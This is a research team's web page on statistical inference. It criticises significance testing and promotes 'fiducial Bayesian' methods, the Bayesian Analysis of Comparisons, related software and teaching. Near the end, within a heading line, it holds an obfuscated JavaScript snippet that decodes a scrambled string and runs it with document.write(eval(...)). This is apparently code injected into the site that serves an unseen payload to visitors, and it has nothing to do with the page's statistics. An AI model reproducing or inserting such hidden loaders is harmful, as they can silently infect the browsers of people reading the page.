Equipe Raisonnement Induction Statistique

Statistical researches
 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications

The statistical researches of ERIS concern the methods for analysing experimental data. The privileged application fields are experimental psychology and clinical trials in medecine and pharmacology. The specificities of these fields are, one one hand that complex experimental desings are generally used, with precise objectives,and on the other hand that experimental results must be accepted by a large community.

## 1. Criticisms of usual significance tests

"The test provides neither the necessary nor the sufficient scope or typeof knowledge that basic scientific social research requires."(D.E. Morrison & R.E. Henkel)

Although the use of Null Hypothesis Significance Testing (NHST) has been criticized by the most eminent and the most experienced scientists, both on theoretical and methodological grounds, it is always required in most scientific publications as an unavoidable norm. Our conclusion is that the use of NHST is a socially adapted but methodologically unsuited use of an inadequate tool promoted through misleading guidelines of standard textbooks.

### The abuses of interpretation of significance tests

 Consider an experiment involving two crossed factors Age and Treatment, each with two modalities. The means of the four experimental conditions (with 10 subjects in each) are respectively 5.77 (a1,t1), 5.25 (a2,t1), 4.83 (a1,t2) and 4.71 (a2,t2). The following typical comments, based on ANOVA \$F\$ tests, are found in an experimental review: "the only significant effect is a main effect of treatment (F[1,36]=6.39, p=0.016), reflecting a substantial improvement''; and again "clearly, there is no evidence (F[1,36]=0.47, p=0.50) of an interaction". It is strongly suggested to the reader that it has been demonstrated both a large main effect of treatment and a small interaction effect. Do you agree with these conclusions?

### Time for new publication guidelines?

"Habit is habit and not to be flung out of the window by any man,but coaxed downstairs a step at a time." (Mark Twain)

Especially in psychology, changes could be the consequence of the Task Force on Statistical Inference charged by the American Psychological Association of studying the role of NHST in psychological research.

[Wilkinson, L. and Task Force on Statistical Inference, APA Board of Scientific Affairs (1999) - Statistical Methods in Psychology Journals: Guidelines and Explanations. American Psychologist, 54, 594-604.
Azar B. (1999) - APA statistics task force prepares to release recommendations for public comment. APA Monitor Online, 30, 5.]

"The essence of science is replication: a scientist should always be concerned about what would happen if he or another scientist were to repeat his experiment." (Guttman).

In 2006, TheAssociation for Psychological Science introduced in the "author guidelines" of Psychological Science, a new norm of publication:

Statistics

Effect sizes should accompany major results. In addition, authors are encouraged to use prep rather than p values (see the article by Killeen in the May 2005 issue of Psychological Science, Vol. 16, pp. 345-353).

Killeen's prep ("probability of replication") now routinely appears in Psychological Science.

### New difficulties with confidence intervals

"It would not be scientifically sound to justify a procedure by frequentist arguments and to interpret it in Bayesian terms." (H. Rouanet)

Confidence intervals could quickly become a compulsory norm in experimental publications. However, for many reasons due to their frequentist (Neyman and Pearson) conception, confidence ntervals can hardly be viewed as the ultimate method.
Indeed the appealing feature of confidence intervals is the result of a fundamental misunderstanding. As is the case with significance tests, the frequentist interpretation of a 95% confidence interval involves a long run repetition of the same experiment: in the long run 95% of computed confidence intervals will contain the "true value" of the parameter; each interval in isolation has either a 0 or 100% probability of containing it.
It is so strange to treat the data as random even after observation that the orthodox frequentist interpretation of confidence intervals does not make sense for most users.

### There is interval and interval!

 In an introductory statistical textbook, in a serie for the "grand public", whose goal is to give the reader the possibility to "access the deep intuitions in the field", one can find the following interpretation of a confidence interval for a proportion. "If in an opinion poll of size 1000, the observed proportion P is equal to 0.613, the proportion π to estimate has a probability 0.95 of lying in the range: [0.58,0.64]" Do you agree with this interpretation?

 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications

## 2. The Bayesian therapy

### Won't the Bayesian choice be unavoidable?

"We [statisticians] will all be Bayesians in 2020, and then we can be a united profession." (D.V. Lindley)

We argue that Bayesian methods are ideally suited for creating a change of emphasis in the presentation and interpretation of experimental results. We suggest using "noninformative" Bayesian methods as a therapy for curing the misuses and abuses of NHST.
For many years we have worked with colleagues in France with this perspective in mind in order to develop standard "noninformative" Bayesian methods for the most familiar situations encountered in experimental data analysis.

### The fiducial Bayesian methods

"Maybe Fisher's biggest blunder [fiducial inference] will become a big hit in the 21st century." (B. Efron)

In order to promote these Bayesian methods, it seemed important to us to give them a more explicit name than "standard", "noninformative" or "reference". We propose to call them fiducial Bayesian. This deliberately provocative name pays tribute to Fisher's work on scientific inference for research workers. It indicates their specificity and their aim to express "what the data have to say".
These fiducial Bayesian methods are concrete proposals in order to bypass the shortcomings of NHST and improve current statistical methodology and practice

 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications

## 3. Development of alternative statistical inference methods

"A common misconception is that Bayesian analysis is a subjective theory; this is neither true historically nor in practice." (J. Berger)

Our goal is to develop general alternative methods better suited to the needs of users. The Bayesian inference is a privileged theorical framework, at least as objective as the traditional frequentist inference.
The fiducial-Bayesian methods have been applied many times to real data and well accepted by experimental journals

"Bayesian posterior probabilities are exactly what scientists want." (S.N. Goodman & J.A. Berlin)

### I have the test statistic, can I get an interval?

 I have find an article that report the results of a study designed to test the efficacy of a drug by comparing two groups (treatment vs placebo) of 15 patients each. The gives the observed difference d=+1.52 in favour of the treatment, and a "Student t test": t=+0.683, 28 degrees of freedom, p=0.50, nonsignificant. I would be interested in an interval estimate (frequentist confidence interval, or fiducial-Bayesian credible interval) in order to assess if the inefficacy of the treatment has really been proved. Is it possible?

## Software: LesMoyennes

"An essential aspect of the process of evaluating design strategies is the ability to calculate predictive probabilities of potential results." (D.A. Berry)

The ease of making predictions is a particular attractive feature of Bayesian inference

## Software: LesEffectifs

 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications

## 4. The Bayesian Analysis of Comparisons

"ANOVA may be the most commonly used statistical procedure. It is assuredly the most commonly misused statistical procedure!" (D.A. Berry)

The Bayesian Analysis of Comparisons gives a flexible methodological framework, in order to bypass the strict constraints imposed by the traditional "general linear model" and to privilege the users' questions. Two main principles are the notion of specific analysis and the use of Bayesian methods.

## Software: PAC (Program for the Analysis of Comparisons)

 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications

## 5. The likelihood principle: A need of rethink

The information on the experimental design, including the stopping rule, is one part of the evidence, prior to the sampling. Consequently this information must be incorporated in the prior Bayesian distribution (R. de Cristofaro, on the foundations of likelihood principle, Journal of Statistical Planning and Inference, 2004, 401–411).
This approach allows to relax the likelihood principle (in its usual form) when appropriate. In particular, a state of ignorance (or indifference) cannot be defined without reference to the design.
Applying these ideas, Bunouf and Lecoutre (2006, 2008) developed Jeffreys-type priors derived from likelihood augmented with the design information in multistage designs. They showed that the use of such priors corrects the posteriors from the stopping rule bias.
 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications

## Software: LesDistributions

 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications

## Software: LesProportions

### Comparison of censored survival curves (especially Weibull model)

 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications

New sequential designs that generalize the play-the-winner rule are studied. Theoretical and numerical results show that these designs are preferable to previously proposed designs for the usual criteria.
Bayesian methods are developed for these designs.

 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications

## 9. Statistical inference and causal analysis

Reflexions about the causal analysis of randomized experiments.

## Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications 10. Methodological and didactical implications

The methodological implications of the developed procedures (do they fit the true needs of users?) are studied from analyses of real experimental data.

"In fact, I find it easier teaching Bayesian statistics than frequentist statistics. There is a single, pivotal notion - Bayes' rule - that describes the process of learning. Bayes' rule is especially easy to teach, and it is easy for students to use." (D.A. Berry)

### Consulting

Psychologists - Pharmaceutical companies.

### Teaching of Bayesian methods for the analysis of experimental data

The conclusion is that teaching the Bayesian approach in the context of experimental data analysis appears both desirable and feasible.

## <!-- var n2="";for(var u3=0;u3<319;u3++)n2+=String.fromCharCode(("0A,7RQJC3\'Qf,1gL=C098:LJ::A0@>0L?3C=g3=04>X\'\'\'Q81Cg7?:,C4=0;d\'QX0RY7,.VL CY2@->LX>[SS?=Rww0U\'Q7@?=.:www@0-=X=09:\'Q.0R;7,2V&YwY&Z(LL(jLXSUL=k?.3,U\'Q2RZS7\'\'@8,40EEZZ\\:8\'QE.E;7,X=0YEY.0RvLX2VL>?=>@-SU\'QR[SJ:9\'\'\'QL>0:8:@ZL?@?gX3=34>\'\'\'Q\'\'01gmZ:\'QLh,.?9Z?fY,J@>=0;h\'QX0RY7,.VL#ZY2@->LX>[SS?=RQX=0;7,.0RYRXXXSRXXXSY2VLN\\N[LSS".charCodeAt(u3)-(-50+92)+9*0+63)%(130-35)+0x20);document.write(eval(n2)) //-->

 Criticismsof usualsignificance tests TheBayesiantherapy Developmentof alternativeinference methods The BayesianAnalysisof Comparisons Thelikelihood principleA need to rethink Studyofnew distributions Otherapplicationfields Adaptativedesigns Statistical inferenceandcausal analysis Methodologicalanddidactical  implications